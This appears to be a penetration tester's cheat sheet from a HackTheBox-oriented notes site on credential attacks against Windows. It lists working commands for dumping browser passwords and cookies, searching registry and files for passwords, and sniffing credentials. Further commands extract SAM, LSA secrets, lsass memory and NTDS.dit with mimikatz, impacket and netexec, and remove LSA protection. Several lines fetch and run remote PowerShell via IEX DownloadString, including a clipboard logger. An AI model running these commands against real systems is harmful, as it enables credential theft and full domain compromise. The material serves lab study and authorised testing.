Intrusionz3r0-WriteupsHacktheboxGithubLinkedln
ChatGPTChatGPT

Credentials Attacks On Windows

Web Credentials

PS C:\> start lazagne.exe all
PS C:\> .\\SharpChrome.exe logins /unprotect


PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all

#-----------EDGE---------------------------------
#Extract credentials from Edge Browswer
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIF>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect

#-----------Firefox-------------------------------
#Extract passwords from profiles of Mozilla
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/

#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz  dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

#Cookies
#Path: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"

Credentials manager

#Listing Saved Credentials
PS C:\> cmdkey /list

#Enumerate windows credentials
PS C:\> vaultcmd /listcreds:"Windows Credentials" /all

PS C:\> C:\Temp>SharpDPAPI.exe machinecredentials

#Find credentials store
PS C:\> C:\Users\<user>\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx/556a2412-xxxx-4ccf-b721-e6a0b4f90407

#1. Decrypt master key
mimikatz \"dpapi::masterkey /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected \" exit

#2. Extract credentials
mimikatz \"dpapi::cred /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Credentials\\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9a<SNIF>f319e9c84

DPAPI

#Using Donpapi (best options)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem

Search Credentials

Extract credentials using SessionGopher

PS C:\\htb> Import-Module .\\SessionGopher.ps1
PS C:\\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

Sniff passwords and hashes with net-creds

Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0

Search credentials on the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\\htb> Get-ChildItem -Path C:\\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\\htb> Get-ChildItem -Path "C:\\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line

Search for filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\\htb> dir \\confidentials.txt /s /p
PS C:\\htb> Get-ChildItem -Path C:\\ -Filter "confidentials.txt" -Recurse

Passwords in unattend.xml

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Retrieve Putty Credentials from registry

PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions
PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\\<value>

PowerShell

Powershell History File

PS C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath

Powershell Transcript

PS C:\> gc C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
PS C:\> gc C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

Recover credentials on PowerShell scripts

First Option:

PS C:\\htb> $credential = Import-Clixml -Path 'C:\\scripts\\pass.xml'
PS C:\\htb> $credential.GetNetworkCredential().username
PS C:\\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!

Second Option

PS C:\> $user = "Administrator"
PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
PS C:\> cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List

Alternate Data Stream

Retrieve Credentials on data streams

PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

Clipboard

Monitor Clipboard

PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1>')
PS C:\\htb> Invoke-ClipboardLogger

Sensitive Files

IIS Web config

PS C:\> Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Retrieve password from Wireless

C:\\htb> netsh wlan show profile
C:\\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Sticky notes

#Path: C:\\Users\\<user>\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\\htb> cd .\\PSSQLite\\
PS C:\\htb> Import-Module .\\PSSQLite.psd1
PS C:\\htb> $db = 'C:\\Users\\htb-student\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite'
PS C:\\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Copying SAM SYSTEM and Security

C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save
C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save
C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save

Dumping SAM and SYSTEM

Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16  save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL 
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam

Dump LSA

Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa

Dump lsass

#Finding LSASS PID in cmd
C:\\Windows\\system32> tasklist /svc

#Finding LSASS PID in Powershell
PS C:\\Windows\\system32>  Get-Process lsass
#----------------------------------------

#Create lssas file
PS C:\\Windows\\system32> rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

#dump the lsass.dmp file.
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 
C:\\Windows\\system32>  .\\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit

Dump lsass using RDP session

Dump NTDS.dit

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.


#List the localgroups
C:\\> net localgroup

#Check user permission.
C:\\> net user bwilliamson

#Check the shadow copy
C:\\> vssadmin CREATE SHADOW /For=C:

#Move the file.
C:\\> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit

#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds

Mimikatz

# Dump the local SAM database 
mimikatz lsadump::sam

#Dump LSA 
mimikatz lsadump::lsa /inject

#Dump secrets
mimikatz lsadump::secrets

# Dump the logon passwords
mimikatz sekurlsa::logonpasswords

# Dump the encryption keys used by Kerberos.
mimikatz sekurlsa::ekeys

# Dump Domain Cached Credentials
mimikatz lsadump::cache

#Dump secrets trust
mimikatz lsadump::sam

Bypassing LSA protection

Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) 

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
PreviousEnumerationNextKerberos

Last updated